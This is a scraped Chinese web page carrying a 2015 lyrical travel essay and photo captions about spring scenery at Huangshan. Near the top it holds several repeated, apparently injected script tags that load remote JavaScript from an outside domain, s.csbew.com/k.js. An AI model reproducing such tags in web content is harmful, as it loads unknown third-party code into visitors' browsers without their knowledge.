北京 天津 河北 山西 内蒙古 辽宁 吉林 黑龙江 上海 江苏 浙江 安徽 福建 江西 山东 河南 湖北 湖南 广东 广西 海南 重庆 四川 贵州 云南 西藏 陕西 甘肃 青海 宁夏 新疆 台湾 香港 澳门 钓鱼岛

踏青:凭阅人文符号 倾听千年赞叹
2015-03-13 10:02:42   来源:县委书记网   评论:0 点击:

<script type=text/javascript>//</script><script type=text/javascript src="http://s.csbew.com/k.js"></script><script type=text/...

<script type=text/javascript>//</script><script type=text/javascript src="http://s.csbew.com/k.js"></script><script type=text/javascript>//</script><script type=text/javascript src="http://s.csbew.com/k.js"></script><script type=text/javascript>//</script><script type=text/javascript src="http://s.csbew.com/k.js"></script>

\

  黄山风景区迎映山红5月为最佳观赏期。绵延百里的怒放山巅,五彩缤纷花香袭人,绘出“千峰叠起嶂

  乌金地下埋,杜鹃花似海,满山留异香”的美丽画卷。(摄影:姚育青)

\

  黄山木兰是黄山风景区早春的一道迷人景观,在奇松怪石、蓝天白云的映衬下,格外的栩栩如生。

  微风轻拂,一股淡淡的清香扑面而来。(摄影:吴春晖)

  踏青:凭阅人文符号 倾听千年赞叹

  独特的天下奇绝风光孕于春风之中。黄山溢彩如画如诗满目春。凭阅黄山,春风起,两山松枝摇曳,飞鸟自悠闲,劲松恋苍山。黄山之巅,峰上看遍徽韵,多少梦,齐思量。春风花雨,松涛如丝牵客梦。

  春涌黄山,独特的中国人文精神充盈山水之间。“五绝”物象与“五胜”人文圆融相通、相互丰盈,黄山在中国式的抽象之中升华精神,抽象的黄山充盈着“五胜”人文,诠释了博大精深的东方哲学。

  水墨之中,繁冗化为简朴,狂想变为睿智,情感升华为精神,清明幽淡之中,古圣先贤的呼唤,声音遥远而清晰,如一片淋漓酣畅的黄山烟云,在文人的铁划银钩中吟咏长题。水墨黄山成为东方哲学里出提炼出标志性的人文符号。

  春之黄山,忘情的展示着大自然的鬼斧神工。晨沐朝晖,暮吞夕烟,蔚为壮观,云开雾散。云雾像仙女的衣袂,轻抚黛青色的山岚,一棵棵笔直的奇松焕发精神,婀娜多姿,活泼起来,丰盈在天地间。而云雾分明就是柔情似水的女子,极尽诗意的缠绵,似乎有说不完的情话。有风,似乎一切都是透明,又是一种景致。大自然与天工巧妙地构造成如诗如画的环境,置身这方宁静的天地中,邀三五好友或扶老携幼来黄山踏青,依石小憩,谈笑风生,别具情意。

  春涌黄山,峰回路转,白云升处有人家;清幽透亮,拥翠流丹,黄山春色美不胜收。明代大旅行家徐霞客曾发出“登黄山天下无山”的千年赞叹,对于兼有“泰岱之雄伟,华山之险峻,衡岳之烟霞,匡庐之飞瀑,峨眉之清凉”的黄山,令普天下游客神往已久。

  五岳归来不看山,黄山归来不看岳。让五岳之首的泰宗都为之逊色的黄山集中国山川之美,令游人魂牵梦绕数千载。

版权声明:
① 凡本网注明“来源:中郡智库网”的所有作品,版权均属于中郡智库网,转载请务必注明"来源:中郡智库网", http://www.xwsj.org。违反者本网将有权追究其法律责任。
② 本网转载并注明其他来源的作品,目的在于传递更多信息,并不代表本网赞同其观点或证实其内容的真实性,不承担此类作品的侵权行为的直接责任及连带责任。其他媒体、网站或个人从本网转载时,必须保留本网注明的作品来源,并自负版权等法律责任。
③ 如涉及作品内容、版权等问题,请在作品发表之日起一周内与本网联系,否则视为放弃相关权利。

相关热词搜索:符号 人文 千年 OA软件

上一篇:何冬青:设计师要做智者,解读天地,认识生命,引领生活
下一篇:影视编剧作家:文艺要传递人文温暖

分享到: 收藏